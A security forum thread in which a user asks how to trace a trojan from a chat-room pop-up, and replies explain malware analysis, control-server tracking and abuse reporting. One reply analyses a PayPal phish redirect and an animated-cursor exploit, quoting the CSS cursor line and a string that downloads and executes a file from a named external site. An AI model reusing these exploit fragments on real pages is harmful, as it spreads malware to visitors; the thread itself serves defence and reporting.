Does anyone know if a trojan virus can be traced back to its sender ? i know where i got it and how but i would love to prove it ? it was put in a pop up window that asked me for my password. My virus pretection caught it and i wrote down all the stuff, others were not as lucky. I would love to send the information needed to stop this person.

thanks ahead of time

Possibly - if you have extensive malware and disassembly skills you may be able to look a trojan's code and see similarities with other known malware. If the author(s) are real amateurs, they may include personal data like email addresses (as noted here (http://www.f-secure.com/weblog/archives/archive-022007.html#00001122)) but anyone stupid enough to do that has likely ripped off someone else's code, not written their own.

Another option is to let a trojan run and find out what it does and where it connects to. Most trojans use IRC (though the latest are now using P2P for communication) so they need to connect to a central server (normally one that has been broken into). Some groups (e.g. Shadowserver (http://www.shadowserver.org/)) specialise in tracking down and terminating such control centres. One (old) account of this type of tracking can be found at The Attacks on GRC.COM (http://www.grc.com/dos/grcdos.htm).

In summary, it's only feasible for those with extensive technical expertise. If you lack such, then you are more likely to infect your system.

However in your case, it may not even be a trojan but instead a webpage exploit (what did your AV identify it as?) that caused the popup. If this occurred on a legitimate site, contact the owner to let them know (if no contact details are given, use a site like DNSStuff (www.dnsstuff.com) or NWTools (www.nwtools.com) to look up the domain details - these should normally give an email address). However if your AV detected it, there is likely little more that you can do.

this is all the info i have the X's are where my name was


file: p[1]. htm
Trojan name: JS/Exploit-BO.gen
file path C\Documents and settings\xxxxxxxxxxxx\LocalSettings\ Temporary Interent Files\Content.IE5\OLM3MR87

I do know exactly where i got it, It was from a 3rd party who set up a chat room for investors using the software LiVve

Maybe there is something in the host site. I would thinking something should show this somewhere

again thanks for the help

It's an old one then according to Network Associate's Information Page (http://vil.nai.com/vil/content/v_130621.htm). If you still get the warning, inform the chatroom host. Otherwise it could have been posted by a visitor or a spam/IRCbot.

To follow up on what Paranoid2000 suggested about analysis -

1) you can analyze phish emails and report them. This is fun, and perhaps you can help stop the phish. While phish sites are not normally dangerous by just visiting them, a "click" on the site could trigger a trojan download, so you should have something in place to prevent remote code execution.

I received this a few days ago:

http://www.urs2.net/rsj/computing/tests/paypal/email.gif

Looks like a phish. Launching to the site:

http://www.urs2.net/rsj/computing/tests/paypal/site.gif

Note that hovering over the "Click Here" reveals that the URL is not PayPal. Clicking on it does bring up a PayPal site, but notice that the URL is different. Hmm... must be a redirect:

http://www.urs2.net/rsj/computing/tests/paypal/site2.gif

Going directly to the site - it seemed to be a legitimate site, perhaps had been hacked to upload this page. I sent her an email and noticed that the file was removed shortly after that. I sent the other URL to shadowserver's efraud. Not a trojan, in this case.


Looking in the /~ellensohn directory of the URL contained in the email reveals the "start.html" file which contains code which redirects:


<meta http-equiv="Refresh" content="0; URL=http://www.[removed]/file/.www.paypal.com/webscr.php?cmd=_login-run"

The link no longer works. Note that the "start.html" file, instead of being a redirect, could have triggered a download via iframe or other such exploits. So, just looking at that URL in the email, you can't tell what is going to happen.

2) Letting an exploit run. Here, as P2K cautions, you have to have protection in place.

Last year, a trojan hijacker was found launched from several sites. I went to one using Opera, and nothing happened. Looking at the source code showed it to be the old animated cursor exploit (MS05-002),


style
* {CURSOR: url("./exp_2/1.ani");}
/style

so I had to fire up IE (unpatched) to get it to run. Since the .ani file is doing the work while it shows in the status bar, the user doesn't see any reference to the .exe file which is attempting to download in the background:

http://www.urs2.net/rsj/computing/imgs/remotecode2.gif

Both the .ani file and .exe file had already been identified by AV:

http://www.urs2.net/rsj/computing/imgs/remotecode-scan2.gif

http://www.urs2.net/rsj/computing/imgs/remotecode-scan.gif


Looking inside the animated cursor file (1.ani) to see how the download worked:

urlmon.dll_URLDownloadToFileA_WinExec_http://kunsthandel-scheider.de/daten/dlle.exe


That web site seemed to be a legitimate site of an art collector. As above, I sent an email to the site, but heard nothing. I contacted Kevin McAleavey at nsclean.com, who sent an email in German. He also heard nothing back. We reported the site, but checking today, I see that the trojan file is still on the site. So, efforts don't always pay off, but it's still worth tracing back to the sender just in case.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier